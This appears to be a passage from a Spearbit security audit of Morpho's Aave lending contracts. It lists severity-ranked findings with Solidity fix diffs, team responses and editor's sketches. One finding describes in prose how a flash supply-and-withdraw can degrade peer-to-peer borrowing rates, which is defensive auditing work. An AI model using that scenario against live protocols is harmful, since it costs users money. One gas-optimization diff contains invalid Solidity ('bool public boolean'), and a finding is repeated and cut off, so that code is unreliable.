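Editor's note: a minimal sketch of such a setter, assuming the swap manager is Ownable. The setTwapInterval name, the bounds and the event are hypothetical; the report only asks for the value to be changeable:

uint32 public twapInterval = 1 hours; // replaces the former TWAP_INTERVAL constant

event TwapIntervalSet(uint32 _newTwapInterval);

function setTwapInterval(uint32 _newTwapInterval) external onlyOwner {
    // Illustrative bounds: long enough to resist manipulation, short enough to track the market.
    require(_newTwapInterval >= 5 minutes && _newTwapInterval <= 1 days, "interval out of bounds");
    twapInterval = _newTwapInterval;
    emit TwapIntervalSet(_newTwapInterval);
}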
+5.3.3 PositionsManagerForAave claimToTreasury could allow sending underlying to the 0x address

Severity: Medium Risk
Context: PositionsManagerForAave.sol#L223-L232
Description: claimToTreasury currently does not verify that the treasuryVault address is != address(0). In the current state, it would allow the owner of the contract to burn the underlying token instead of sending it to the intended treasury address.

Recommendation: Add a check to prevent sending treasury underlying tokens to address(0), and verify that amountToClaim is != 0 to prevent wasting gas and emitting a "false" event.

 function claimToTreasury(address _poolTokenAddress)
     external
     onlyOwner
     isMarketCreatedAndNotPaused(_poolTokenAddress)
 {
+    require(treasuryVault != address(0), "treasuryVault != address(0)");
     ERC20 underlyingToken = ERC20(IAToken(_poolTokenAddress).UNDERLYING_ASSET_ADDRESS());
     uint256 amountToClaim = underlyingToken.balanceOf(address(this));
+    require(amountToClaim != 0, "amountToClaim != 0");
     underlyingToken.safeTransfer(treasuryVault, amountToClaim);
     emit ReserveFeeClaimed(_poolTokenAddress, amountToClaim);
 }

Morpho: Fixed in PR #562.
Spearbit: Acknowledged.

+5.3.4 rewardsManager used in MatchingEngineForAave could be not initialized

Severity: Medium Risk
Context: MatchingEngineForAave.sol#L380-L385, MatchingEngineForAave.sol#L410-L415
Description: MatchingEngineForAave updates the userUnclaimedRewards for a supplier/borrower each time they get updated. rewardsManager is not initialized in PositionsManagerForAaveLogic.initialize but only via PositionsManagerForAaveGettersSetters.setRewardsManager, which means that it will start as address(0). Each time a supplier or borrower gets updated while the rewardsManager address is empty, the transaction will revert. To replicate the issue, just comment out positionsManager.setRewardsManager(address(rewardsManager)); in TestSetup and run make c-TestSupply. All tests will fail with [FAIL. Reason: Address: low-level delegate call failed].

Recommendation: Make sure to always call PositionsManagerForAaveGettersSetters.setRewardsManager after deploying and initializing PositionsManagerForAaveLogic, or pass it directly to PositionsManagerForAaveLogic.initialize as a new parameter.

Morpho: A check on address(rewardsManager) != address(0) has been implemented in PR #554.
Spearbit: Acknowledged.
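Editor's note: a minimal sketch of the kind of null-check guard the fix describes, as it could look inside MatchingEngineForAave's update functions. The rewards-manager method name and parameters below are illustrative; the exact shape of PR #554 may differ:

// Hypothetical guard inside updateSuppliers/updateBorrowers: skip reward accounting
// while no rewards manager has been configured, instead of calling address(0).
if (address(rewardsManager) != address(0)) {
    rewardsManager.updateUserAssetAndAccruedRewards( // method name illustrative
        _user,
        _poolTokenAddress,
        _userBalance,
        _totalBalance
    );
}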
+5.3.5 Missing input validation checks on contract initialize/constructor

Severity: Medium Risk
Context:
• MarketsManagerForAave.sol#L125-L130
• PositionsManagerForAaveLogic.sol#L24-L42
• RewardsManagerForAave.sol#L63-L66
• SwapManagerUniV2.sol#L54-L70
• SwapManagerUniV3.sol#L58-L85
• SwapManagerUniV3OnEth.sol#L65-L87
Description: initialize/constructor input parameters should always be validated to prevent the creation/initialization of a contract in a wrong/inconsistent state.

Recommendation: Consider implementing the following changes.

MarketsManagerForAave.sol

 function initialize(ILendingPool _lendingPool) external initializer {
+    require(address(_lendingPool) != address(0), "input != address(0)");
     __UUPSUpgradeable_init();
     __Ownable_init();
     lendingPool = ILendingPool(_lendingPool);
 }

PositionsManagerForAaveLogic.sol

Important note: _maxGas and NDS values should also be validated considering the following separate issues:
• Low/high MaxGas values could make match/unmatch supplier/borrower functions always "fail" or revert #34
• NDS min/max value should be properly validated to avoid tx to always fail/skip loop #33

 function initialize(
     IMarketsManagerForAave _marketsManager,
     ILendingPoolAddressesProvider _lendingPoolAddressesProvider,
     ISwapManager _swapManager,
     MaxGas memory _maxGas
 ) external initializer {
+    require(address(_marketsManager) != address(0), "_marketsManager != address(0)");
+    require(address(_lendingPoolAddressesProvider) != address(0), "_lendingPoolAddressesProvider != address(0)");
+    require(address(_swapManager) != address(0), "_swapManager != address(0)");
     __UUPSUpgradeable_init();
     __ReentrancyGuard_init();
     __Ownable_init();
     maxGas = _maxGas;
     marketsManager = _marketsManager;
     addressesProvider = _lendingPoolAddressesProvider;
     lendingPool = ILendingPool(addressesProvider.getLendingPool());
     matchingEngine = new MatchingEngineForAave();
     swapManager = _swapManager;
     NDS = 20;
 }

RewardsManagerForAave.sol

 constructor(ILendingPool _lendingPool, IPositionsManagerForAave _positionsManager) {
+    require(address(_lendingPool) != address(0), "_lendingPool != address(0)");
+    require(address(_positionsManager) != address(0), "_positionsManager != address(0)");
     lendingPool = _lendingPool;
     positionsManager = _positionsManager;
 }

SwapManagerUniV2.sol

 constructor(address _morphoToken, address _rewardToken) {
+    require(_morphoToken != address(0), "_morphoToken != address(0)");
+    require(_rewardToken != address(0), "_rewardToken != address(0)");
     MORPHO = _morphoToken;
     REWARD_TOKEN = _rewardToken;
     /// ...
 }

SwapManagerUniV3.sol

Worth noting:
• _morphoPoolFee should have a max value check
• _rewardPoolFee should have a max value check

 constructor(
     address _morphoToken,
     uint24 _morphoPoolFee,
     address _rewardToken,
     uint24 _rewardPoolFee
 ) {
+    require(_morphoToken != address(0), "_morphoToken != address(0)");
+    require(_rewardToken != address(0), "_rewardToken != address(0)");
     MORPHO = _morphoToken;
     MORPHO_POOL_FEE = _morphoPoolFee;
     REWARD_TOKEN = _rewardToken;
     REWARD_POOL_FEE = _rewardPoolFee;
     /// ...
 }

SwapManagerUniV3OnEth.sol

Worth noting:
• _morphoPoolFee should have a max value check

 constructor(address _morphoToken, uint24 _morphoPoolFee) {
+    require(_morphoToken != address(0), "_morphoToken != address(0)");
     MORPHO = _morphoToken;
     MORPHO_POOL_FEE = _morphoPoolFee;
     /// ...
 }

Morpho: It is our responsibility to set our contracts properly at deployment, so we don't think it is that relevant to add these require statements, knowing that the PositionsManager is already a large contract. However, we agree that the two following issues are relevant:
• Low/high MaxGas values could make match/unmatch supplier/borrower functions always "fail" or revert #34
• NDS min/max value should be properly validated to avoid tx to always fail/skip loop #33

Spearbit: Acknowledged.
+5.3.6 Setting a new rewards manager breaks claiming old rewards

Severity: Medium Risk
Context: PositionsManagerForAaveGettersSetters.sol#L62
Description: Setting a new rewards manager will break any old unclaimed rewards, as users can only claim through the PositionManager.claimRewards function, which then uses the new rewards manager.

Recommendation: Be cautious when setting new rewards managers and ideally ensure there aren't any unclaimed user rewards.

Morpho: Perhaps make this setter settable only once? And have another setter saying whether or not we should accrue rewards of users, so that in the MatchingEngine we do not call the rewards manager if we already know there is no more liquidity mining.

Spearbit: That is one way to solve it if you don't need the migration behavior.

Morpho: We decided to keep it as it is for now. We will warn users if we plan to change the rewards manager. In the end we'll need different rewards managers.

Spearbit: Acknowledged, changes have not been made.
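Editor's note: a minimal sketch of the "settable only once" variant Morpho floats above. The setter name, interface and event follow the ones the report already references; the added require is the only change:

function setRewardsManager(address _rewardsManagerAddress) external onlyOwner {
    // Reverts on any second call, so pending rewards can never be orphaned by a swap.
    require(address(rewardsManager) == address(0), "rewards manager already set");
    rewardsManager = IRewardsManagerForAave(_rewardsManagerAddress);
    emit RewardsManagerSet(_rewardsManagerAddress);
}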
+5.3.7 Low/high MaxGas values could make match/unmatch supplier/borrower functions always "fail" or revert

Severity: Medium Risk
Context: PositionsManagerForAaveGettersSetters.sol#L47-L50, PositionsManagerForAaveLogic.sol#L34
Description: The maxGas variable is used to determine how much gas matchSuppliers, unmatchSuppliers, matchBorrowers and unmatchBorrowers can consume while trying to match/unmatch a supplier/borrower and also updating their position if matched.
• maxGas = 0 will make the loop be skipped entirely.
• A low maxGas would make the loop run at least once, but the smaller maxGas is, the higher the possibility that not all the available suppliers/borrowers are matched/unmatched.
• A high maxGas could make the loop consume all the block gas, making the tx revert.
Note that maxGas can be overridden by the user when calling supply or borrow.

Recommendation: Perform enough tests to determine safe min/max values for maxGas.

Morpho: These parameters will be decided by governance in the future. We will implement a time-lock of seven days to make sure everyone can check the relevance of these parameters. Also, the governance has no incentive to implement wrong params that could harm Morpho and its users.

Spearbit: Acknowledged.

+5.3.8 NDS min/max value should be properly validated to avoid tx to always fail/skip loop

Severity: Medium Risk
Context: PositionsManagerForAaveGettersSetters.sol#L40-L43
Description: PositionsManagerForAaveLogic is currently initialized with a default value of NDS = 20. The NDS value is used by MatchingEngineForAave when it needs to call DoubleLinkedList.insertSorted in both updateBorrowers and updateSuppliers. updateBorrowers and updateSuppliers are called by:
• MatchingEngineForAave.matchBorrowers
• MatchingEngineForAave.unmatchBorrowers
• MatchingEngineForAave.matchSuppliers
• MatchingEngineForAave.unmatchSuppliers
Those functions, and also directly updateBorrowers and updateSuppliers, are also called by PositionsManagerForAaveLogic.
Problems:
• A low NDS value would make the loop inside insertSorted exit early, increasing the probability of a supplier/borrower being added to the tail of the list. This is something that Morpho would like to avoid, because it would decrease protocol performance when it needs to match/unmatch suppliers/borrowers.
• In the case where a list is long enough, a very high value would make the transaction revert each time one of those functions directly or indirectly calls insertSorted. The gas guard rail present in the match/unmatch supplier/borrower functions does not help here, because the loop would be run at least once.

Recommendation: Perform enough tests to determine safe min/max values for NDS that protect from DoS but still make the protocol perform as expected. A bounded setter is sketched below.

Morpho: Fix has been implemented.

Spearbit: Acknowledged.
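Editor's note: a minimal sketch of a bounded setter. The MIN_NDS/MAX_NDS values are placeholders to be determined by the recommended testing, not values from the report:

uint8 public constant MIN_NDS = 5;  // placeholder lower bound
uint8 public constant MAX_NDS = 50; // placeholder upper bound

function setNDS(uint8 _newNDS) external onlyOwner {
    // Reject values that would either degrade sorting (too low) or risk
    // out-of-gas reverts inside insertSorted (too high).
    require(_newNDS >= MIN_NDS && _newNDS <= MAX_NDS, "NDS out of bounds");
    NDS = _newNDS;
    emit NDSSet(_newNDS);
}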
+5.3.9 Initial SwapManager cumulative prices values are wrong

Severity: Medium Risk
Context: SwapManagerUniV2.sol#L65-L66
Description: The initial cumulative price values are integer divisions of unscaled reserves and not UQ112x112 fixed-point values.

(reserve0, reserve1, blockTimestampLast) = pair.getReserves();
price0CumulativeLast = reserve1 / reserve0;
price1CumulativeLast = reserve0 / reserve1;

One of these values will (almost) always be zero due to integer division. Then, when the difference against the real currentCumulativePrices is taken in update, the TWAP will be a large, wrong value. The slippage checks will not work correctly.

Recommendation: Consider using the same code as the UniswapV2 example oracle.

Morpho: Fixed in PR #550.
Spearbit: Acknowledged.
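Editor's note: for reference, a sketch of how Uniswap V2's ExampleOracleSimple initializes these values. It reads the pair's own UQ112x112-encoded accumulators instead of dividing raw reserves (price0CumulativeLast() and price1CumulativeLast() are real IUniswapV2Pair getters):

price0CumulativeLast = pair.price0CumulativeLast(); // cumulative token1/token0 price, UQ112x112-encoded
price1CumulativeLast = pair.price1CumulativeLast(); // cumulative token0/token1 price, UQ112x112-encoded
(, , blockTimestampLast) = pair.getReserves();      // only the timestamp of the last pair update is needed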
+5.3.10 P2P borrowers' rate can be reduced

Severity: Medium Risk
Context: MarketsManagerForAave.sol#L448
Description: Users on the pool currently earn an inferior rate compared to users with P2P credit lines. There is a queue for being connected P2P. As this queue cannot be fully processed in one single transaction, the protocol introduces the concept of a maximum iteration count and a borrower/supplier "delta" (c.f. yellow paper). This delta leads to a worse rate for existing P2P users. An attacker can force a delta to be introduced, which leads to worse rates.

Example: Imagine some borrowers are matched P2P (earning a low borrow rate), and many are still on the pool and therefore in the pool queue (earning a worse borrow rate from Aave).
• An attacker supplies a huge amount, creating a P2P credit line for every borrower (they can repeat this step several times if the max iterations limit is reached).
• The attacker immediately withdraws the supplied amount again. The protocol now attempts to demote the borrowers and reconnect them to the pool, but the algorithm performs a "hard withdraw" as the last step if it reaches the max iteration limit, creating a borrower delta. These are funds borrowed from the pool (at a higher borrow rate) that are still wrongly recorded to be in a P2P position for some borrowers. This increase in the borrow rate is socialized equally among all P2P borrowers (reflected in an updated p2pBorrowRate as the shareOfDelta increased).
• The initial P2P borrowers earn a worse rate than before. If the borrower delta is large, it's close to the on-pool rate.
• If an attacker-controlled borrower account was newly matched P2P and not properly reconnected to the pool (in the "demote borrowers" step of the algorithm), it will earn the better P2P rate instead of the on-pool rate it earned before.

Recommendation: Consider mitigations for single-transaction flash supply & withdraw attacks.

Morpho: We may want to refactor the entire queue system at some point.
Spearbit: Acknowledged.

+5.3.11 User withdrawals can fail if Morpho position is close to liquidation

Severity: Medium Risk
Context: PositionsManagerForAaveLogic.sol#L246
Description: When trying to withdraw funds from Morpho as a P2P supplier, the last step of the withdrawal algorithm borrows an amount from the pool ("hard withdraw"). If Morpho's debt / collateral value on Aave is higher than the market's maximum LTV ratio but lower than the market's liquidation threshold, the borrow will fail and the position cannot be liquidated. Therefore withdrawals could fail.

Recommendation: This seems hard to solve in the current system, as it relies on the "hard withdraws" to always ensure enough liquidity for P2P suppliers. Consider ways to mitigate the impact of this problem.

Morpho: Since Morpho will first launch on Compound (where there is only a Collateral Factor), we will not focus now on this particular issue.
Spearbit: Acknowledged.

5.4 Low Risk

+5.4.1 Event Withdrawn is emitted using the wrong amounts of supplyBalanceInOf

Severity: Low Risk
Context: PositionsManagerForAaveLogic.sol#L252-L258
Description: Inside the _withdraw function, all changes performed to supplyBalanceInOf are done using the _supplier address. The _receiver is correctly used only to transfer the underlying token via underlyingToken.safeTransfer(_receiver, _amount);. The Withdrawn event should be emitted passing the supplyBalanceInOf[_poolTokenAddress] of the supplier and not the receiver. This problem will arise when this internal function is called by PositionsManagerForAave.liquidate, where the supplier (the borrower in this case) and the receiver (the liquidator) are not the same address.

Recommendation: Use the supplier address to access supplyBalanceInOf when emitting the Withdrawn event.

 emit Withdrawn(
     _supplier,
     _poolTokenAddress,
     _amount,
-    supplyBalanceInOf[_poolTokenAddress][_receiver].onPool,
-    supplyBalanceInOf[_poolTokenAddress][_receiver].inP2P
+    supplyBalanceInOf[_poolTokenAddress][_supplier].onPool,
+    supplyBalanceInOf[_poolTokenAddress][_supplier].inP2P
 );

Morpho: Fixed in PR #556; the event has been moved to the entrypoint contract and uses msg.sender as the index, which is the supplier.
Spearbit: Acknowledged.
+5.4.2 _repayERC20ToPool is approving the wrong amount

Severity: Low Risk
Context: PositionsManagerForAaveLogic.sol#L502-L510
Description: _repayERC20ToPool approves the amount of underlying token specified via the input parameter _amount, when the correct amount that should be approved is the one calculated via:

_amount = Math.min(
    _amount,
    variableDebtToken.scaledBalanceOf(address(this)).mulWadByRay(_normalizedVariableDebt)
);

Recommendation: Approve the correct amount of underlying token. A possible solution may be as depicted below:

-_underlyingToken.safeApprove(address(lendingPool), _amount);
 IVariableDebtToken variableDebtToken = IVariableDebtToken(
     lendingPool.getReserveData(address(_underlyingToken)).variableDebtTokenAddress
 );
 // Do not repay more than the contract's debt on Aave
 _amount = Math.min(
     _amount,
     variableDebtToken.scaledBalanceOf(address(this)).mulWadByRay(_normalizedVariableDebt)
 );
+_underlyingToken.safeApprove(address(lendingPool), _amount);

Additionally, variableDebtToken.scaledBalanceOf(address(this)).mulWadByRay(_normalizedVariableDebt) could be replaced by variableDebtToken.balanceOf(address(this)) to save gas, given how balanceOf is implemented on the Aave contract. In this case, the uint256 _normalizedVariableDebt function parameter should be removed.

Morpho: Fixes have been implemented in PR #536.
Spearbit: Acknowledged.

+5.4.3 Possible unbounded loop over enteredMarkets array in _getUserHypotheticalBalanceStates

Severity: Low Risk
Context: PositionsManagerForAaveLogic.sol#L416
Description: PositionsManagerForAaveLogic._getUserHypotheticalBalanceStates loops over enteredMarkets, which could be an unbounded array, leading to a reverted transaction caused by the block gas limit. While it is true that Morpho will probably handle a subset of the assets supported by Aave, this loop could still revert because of gas limits for a variety of reasons:
• In the future Aave could have more assets and Morpho could match 1:1 those assets.
• Block gas size could decrease.
• Opcodes could cost more gas.

Recommendation: Implement a mechanism that removes _poolTokenAddress from the market array to reduce the array size if the user no longer has tokens in that specific market (see the sketch below).

Morpho: Fixed in PR #560 by possibly exiting the market on withdraw/repay.
Spearbit: Acknowledged.
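Editor's note: a minimal sketch of such a pruning mechanism. The helper name and the swap-and-pop approach are illustrative, not Morpho's actual fix in PR #560; the supplyBalanceInOf/borrowBalanceInOf/enteredMarkets names come from the report:

function _exitMarketIfEmpty(address _user, address _poolTokenAddress) internal {
    if (
        supplyBalanceInOf[_poolTokenAddress][_user].onPool == 0 &&
        supplyBalanceInOf[_poolTokenAddress][_user].inP2P == 0 &&
        borrowBalanceInOf[_poolTokenAddress][_user].onPool == 0 &&
        borrowBalanceInOf[_poolTokenAddress][_user].inP2P == 0
    ) {
        address[] storage markets = enteredMarkets[_user];
        for (uint256 i; i < markets.length; i++) {
            if (markets[i] == _poolTokenAddress) {
                // Swap-and-pop keeps the array dense and the loop in
                // _getUserHypotheticalBalanceStates as short as possible.
                markets[i] = markets[markets.length - 1];
                markets.pop();
                break;
            }
        }
    }
}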
+5.4.4 Wrong liquidation value when withdrawn amount is non-zero

Severity: Low Risk
Context: PositionsManagerForAaveLogic.sol#L438-L439
Description: When _withdrawnAmount is non-zero, the liquidationValue computation uses assetData.liquidationValue but should use assetData.liquidationThreshold instead.

Recommendation: Currently, this does not lead to any issues, as _withdrawnAmount is always zero on liquidations and all other calls to _getUserHypotheticalBalanceStates ignore this liquidationValue. We still recommend fixing this bug in case the return value is used in the future.

 liquidationValue -= Math.min(
     liquidationValue,
-    (_withdrawnAmount * assetData.underlyingPrice * assetData.liquidationValue) /
+    (_withdrawnAmount * assetData.underlyingPrice * assetData.liquidationThreshold) /
         (assetData.tokenUnit * MAX_BASIS_POINTS)
 );

Morpho: Fixed in PR #563 according to the recommendation.
Spearbit: Acknowledged.

+5.4.5 Missing parameter validation on setters and event spamming prevention

Severity: Low Risk
Context:
• RewardsManagerForAave.sol#L72-L79
• MarketsManagerForAave.sol#L143-L151
• MarketsManagerForAave.sol#L189-L196
• MarketsManagerForAave.sol#L200-L202
• MarketsManagerForAave.sol#L206-L208
• PositionsManagerForAaveGettersSetters.sol#L33-L36
• PositionsManagerForAaveGettersSetters.sol#L40-L43
• PositionsManagerForAaveGettersSetters.sol#L47-L50
• PositionsManagerForAaveGettersSetters.sol#L54-L57
• PositionsManagerForAaveGettersSetters.sol#L61-L64
• PositionsManagerForAaveGettersSetters.sol#L68-L72
Description: User parameter validity should always be verified to prevent contract updates to an inconsistent state. The parameter's value should also be different from the old one, in order to prevent event spamming (emitting an event when not needed) and improve contract monitoring.

contracts/aave/RewardsManagerForAave.sol

 function setAaveIncentivesController(address _aaveIncentivesController) external override onlyOwner {
+    require(_aaveIncentivesController != address(0), "param != address(0)");
+    require(_aaveIncentivesController != address(aaveIncentivesController), "param != prevValue");
     aaveIncentivesController = IAaveIncentivesController(_aaveIncentivesController);
     emit AaveIncentivesControllerSet(_aaveIncentivesController);
 }

contracts/aave/MarketsManagerForAave.sol

 function setReserveFactor(address _marketAddress, uint16 _newReserveFactor) external onlyOwner {
-    reserveFactor[_marketAddress] = HALF_MAX_BASIS_POINTS <= _newReserveFactor
-        ? HALF_MAX_BASIS_POINTS
-        : _newReserveFactor;
-    updateRates(_marketAddress);
-    emit ReserveFactorSet(_marketAddress, reserveFactor[_marketAddress]);
+    require(_marketAddress != address(0), "param != address(0)");
+    uint16 finalReserveFactor = HALF_MAX_BASIS_POINTS <= _newReserveFactor
+        ? HALF_MAX_BASIS_POINTS
+        : _newReserveFactor;
+    if (finalReserveFactor != reserveFactor[_marketAddress]) {
+        reserveFactor[_marketAddress] = finalReserveFactor;
+        emit ReserveFactorSet(_marketAddress, finalReserveFactor);
+    }
+    updateRates(_marketAddress);
 }

 function setNoP2P(address _marketAddress, bool _noP2P)
     external
     onlyOwner
     isMarketCreated(_marketAddress)
 {
+    require(_noP2P != noP2P[_marketAddress], "param != prevValue");
     noP2P[_marketAddress] = _noP2P;
     emit NoP2PSet(_marketAddress, _noP2P);
 }

 function updateP2PExchangeRates(address _marketAddress)
     external
     override
     onlyPositionsManager
+    isMarketCreated(_marketAddress)
 {
     _updateP2PExchangeRates(_marketAddress);
 }

 function updateSPYs(address _marketAddress)
     external
     override
     onlyPositionsManager
+    isMarketCreated(_marketAddress)
 {
     _updateSPYs(_marketAddress);
 }

contracts/aave/positions-manager-parts/PositionsManagerForAaveGettersSetters.sol

 function setAaveIncentivesController(address _aaveIncentivesController) external onlyOwner {
+    require(_aaveIncentivesController != address(0), "param != address(0)");
+    require(_aaveIncentivesController != address(aaveIncentivesController), "param != prevValue");
     aaveIncentivesController = IAaveIncentivesController(_aaveIncentivesController);
     emit AaveIncentivesControllerSet(_aaveIncentivesController);
 }

Important note: the _newNDS min/max value should be accurately validated by the team, because it influences the maximum number of cycles that DLL.insertSorted can do. Setting a value too high would make the transaction fail, while setting it too low would make the insertSorted loop exit earlier, resulting in the user being added to the tail of the list. A more detailed issue about the NDS value can be found here: #33

 function setNDS(uint8 _newNDS) external onlyOwner {
+    // add a check on `_newNDS` validating correctly max/min value of `_newNDS`
+    require(NDS != _newNDS, "param != prevValue");
     NDS = _newNDS;
     emit NDSSet(_newNDS);
 }

Important note: maxGas set to 0 would skip all the MatchingEngineForAave match/unmatch supplier/borrower functions if the user does not specify a custom maxGas. A more detailed issue about the maxGas value can be found here: #34

 function setMaxGas(MaxGas memory _maxGas) external onlyOwner {
+    // add a check on `_maxGas` validating correctly max/min value of `_maxGas`
+    // add a check on `_maxGas` internal values checking that at least one of them is different compared to the old version
     maxGas = _maxGas;
     emit MaxGasSet(_maxGas);
 }

 function setTreasuryVault(address _newTreasuryVaultAddress) external onlyOwner {
+    require(_newTreasuryVaultAddress != address(0), "param != address(0)");
+    require(_newTreasuryVaultAddress != treasuryVault, "param != prevValue");
     treasuryVault = _newTreasuryVaultAddress;
     emit TreasuryVaultSet(_newTreasuryVaultAddress);
 }

 function setRewardsManager(address _rewardsManagerAddress) external onlyOwner {
+    require(_rewardsManagerAddress != address(0), "param != address(0)");
+    require(_rewardsManagerAddress != address(rewardsManager), "param != prevValue");
     rewardsManager = IRewardsManagerForAave(_rewardsManagerAddress);
     emit RewardsManagerSet(_rewardsManagerAddress);
 }

Important note: it should also be checked that _poolTokenAddress is currently handled by the PositionsManagerForAave and by the MarketsManagerForAave. Without this check a poolToken could start in a paused state.

 function setPauseStatus(address _poolTokenAddress) external onlyOwner {
+    require(_poolTokenAddress != address(0), "param != address(0)");
     bool newPauseStatus = !paused[_poolTokenAddress];
     paused[_poolTokenAddress] = newPauseStatus;
     emit PauseStatusSet(_poolTokenAddress, newPauseStatus);
 }

Recommendation: For each setter, add a validity check on the user parameter and a check to avoid updating the state with the same value and firing an event when it is not needed.

Morpho: After reflection, as all these functions will be triggered by governance, it might be overkill to implement all these checks. We will, however, implement min and max values for NDS and for the maxGas values.

Spearbit: Acknowledged.
+5.4.6 DLL should prevent inserting items with 0 value

Severity: Low Risk
Context: DoubleLinkedList.sol#L83
Description: Currently the DLL library only checks that the actual value (_list.accounts[_id].value) in the list associated with _id is 0, to prevent inserting duplicates. The DLL library should also verify that the inserted value is greater than 0. This check would prevent adding users with empty values, which may potentially cause the list, and as a result the overall protocol, to underperform.

Recommendation: Add a require statement to prevent inserting empty values.

 function insertSorted(
     List storage _list,
     address _id,
     uint256 _value,
     uint256 _maxIterations
 ) internal {
+    require(_value != 0, "DLL: _value must be != 0");
     require(_list.accounts[_id].value == 0, "DLL: account already created");
     /// other code
 }

Note that the new require should be placed first, to also avoid the SLOAD performed by the second require.

Morpho: Fixed in PR #526.
Spearbit: Acknowledged.

+5.4.7 insertSorted iterates more than max iterations parameter

Severity: Low Risk
Context: DoubleLinkedList.sol#L91
Description: The insertSorted function iterates _maxIterations + 1 times instead of _maxIterations times.

Recommendation: Consider changing the loop condition from numberOfIterations <= _maxIterations to numberOfIterations < _maxIterations.

Morpho: Fixed in PR #526.
Spearbit: Acknowledged.

+5.4.8 insertSorted does not behave like a FIFO for same values

Severity: Low Risk
Context: DoubleLinkedList.sol#L93
Description: Users that have the same value are inserted into the list before other users with the same value. It does not respect the "seniority" of the users' order and should behave more like a FIFO queue.

Recommendation: Consider introducing the following change:

 while (
     numberOfIterations <= _maxIterations &&
     current != _list.tail &&
-    _list.accounts[current].value > _value
+    _list.accounts[current].value >= _value
 )

Morpho: Agreed, it should behave in FIFO style in this case; fixed in PR #526.
Spearbit: Acknowledged.

+5.4.9 insertSorted inserts elements at wrong index

Severity: Low Risk
Context: DoubleLinkedList.sol#L101
Description: The insertSorted function inserts elements after the last element, when they should actually have been inserted before the last element. The sort order is therefore wrong, even if the maximum iterations count has not been reached. This is because of the check that the current element is not the tail:

if ( ... && current != _list.tail) { insertBefore } else { insertAtEnd }

Example:
• list = [20], insert(40): then current == list.tail, and 40 is inserted at the back instead of the front. result = [20, 40]
• list = [30, 10], insert(20): the insertion point should be before current == 10, but also current == tail, therefore the current != _list.tail condition is false and the element is wrongly inserted at the end. result = [30, 10, 20]

Recommendation: Fix the algorithm (while still respecting FIFO, see #25). At some point, the while loop breaks and current points to some element. If _list.accounts[current].value < _value, it means current is a legitimate entry point to insert before. Otherwise, we insert at the end.

 function insertSorted(
     List storage _list,
     address _id,
     uint256 _value,
     uint256 _maxIterations
 ) internal {
     require(_list.accounts[_id].value == 0, "DLL: account already created");
     uint256 numberOfIterations;
     address current = _list.head;
     while (
         numberOfIterations <= _maxIterations &&
         current != _list.tail &&
-        _list.accounts[current].value > _value
+        _list.accounts[current].value >= _value
     ) {
         current = _list.accounts[current].next;
         numberOfIterations++;
     }
     address nextId;
     address prevId;
-    if (numberOfIterations < _maxIterations && current != _list.tail) {
+    if (_list.accounts[current].value < _value) {
         prevId = _list.accounts[current].prev;
         nextId = current;
     } else prevId = _list.tail;
     // ...
 }

Morpho: Fixed in PR #526.
Spearbit: Acknowledged.
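Editor's note: a Foundry-style test sketch of the second example above ([30, 10], insert 20). It assumes a using-for binding on a DoubleLinkedList.List stored as `list` and the library's getHead/getNext accessors; the addresses are arbitrary labels:

using DoubleLinkedList for DoubleLinkedList.List;
DoubleLinkedList.List internal list;

function testInsertSortedKeepsSortOrder() public {
    list.insertSorted(address(0x30), 30, 16);
    list.insertSorted(address(0x10), 10, 16);
    list.insertSorted(address(0x20), 20, 16);

    // Expected order: [30, 20, 10]. Pre-fix, 20 is wrongly appended after the tail.
    assertEq(list.getHead(), address(0x30));
    assertEq(list.getNext(address(0x30)), address(0x20));
    assertEq(list.getNext(address(0x20)), address(0x10));
}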
-IUniswapV3Pool public pool0; +IUniswapV3Pool public immutable pool0; -IUniswapV3Pool public pool1; +IUniswapV3Pool public immutable pool1; -bool public singlePath; +bool public boolean singlePath; SwapManagerUniV3OnEth.sol -ISwapRouter public swapRouter = ISwapRouter(0xE592427A0AEce92De3Edee1F18E0157C05861564); // The Uniswap V3 router. ,! +ISwapRouter public constant SWAP_ROUTER = ISwapRouter(0xE592427A0AEce92De3Edee1F18E0157C05861564); // ,! The Uniswap V3 router. -IUniswapV3Pool public pool0; +IUniswapV3Pool public immutable pool0; -IUniswapV3Pool public pool1; +IUniswapV3Pool public immutable pool1; -IUniswapV3Pool public pool2; +IUniswapV3Pool public immutable pool2; Recommendation: • Declare selected variable as immutable. • Declare selected variable as constant and follow the solidity style guide for naming. • Remove unused variables. Morpho: Fixes have been implemented in the PR #554. We have also upgraded to Solidity 0.8.13 to leverage the “Reading From Immutable Variables” feature that has been introduced since Solidity 0.8.8 Spearbit: Acknowledged. +5.5.4 Function does not revert if balance to transfer is zero Severity: Gas Optimization Context: PositionsManagerForAave.sol#L228-L231 Description: Currently when the claimToTreasury() function is called it gets the amountToClaim by using un- derlyingToken.balanceOf(address(this). It then uses this amountToClaim in the safeTransfer() function and the ReserveFeeClaimed event is emitted. The problem is that the function does not take into account that it is possible for the amountToClaim to be 0. In this case the safeTransfer function would still be called and the ReserveFeeClaimed event would still be emitted unnecessarily. Recommendation: Consider reusing the AmountIsZero() custom error in this function to prevent safeTransfer() from being called as well as the ReserveFeeClaimed event from being emitted if the amountToClaim is 0. 28 ERC20 underlyingToken = ERC20(IAToken(_poolTokenAddress).UNDERLYING_ASSET_ADDRESS()); uint256 amountToClaim = underlyingToken.balanceOf(address(this)); + if (amountToClaim == 0) revert AmountIsZero(); underlyingToken.safeTransfer(treasuryVault, amountToClaim); emit ReserveFeeClaimed(_poolTokenAddress, amountToClaim); Morpho: Recommendation added in PR #562 Spearbit: Acknowledged. 5.6 Informational +5.6.1 matchingEngine should be initialized in PositionsManagerForAaveLogic’s initialize function Severity: Informational Context: PositionsManagerForAaveLogic.sol#L38 Description: MatchingEngineForAave inherits from PositionsManagerForAaveStorage which is an UUPSUp- gradeable contract. Following UUPS best practices, should also be initialized. the MatchingEngineForAave deployed by PositionsManagerForAaveLogic Recommendation: ForAaveLogic.initialize Initialize MatchingEngineForAave when created and deployed by PositionsManager- Morpho: Now we are using the transparent proxy pattern instead of the UUPS’s one as contract’s exceeds max weight for deployment. I propose to ignore this issue or update it in case of the transparent proxy pattern has an issue as well. Spearbit: Acknowledged, just be sure to follow OZ best practice on contract initialization during the deployment phase. 
+5.5.4 Function does not revert if balance to transfer is zero

Severity: Gas Optimization
Context: PositionsManagerForAave.sol#L228-L231
Description: Currently, when the claimToTreasury() function is called, it gets the amountToClaim by using underlyingToken.balanceOf(address(this)). It then uses this amountToClaim in the safeTransfer() function, and the ReserveFeeClaimed event is emitted. The problem is that the function does not take into account that it is possible for amountToClaim to be 0. In this case the safeTransfer function would still be called and the ReserveFeeClaimed event would still be emitted unnecessarily.

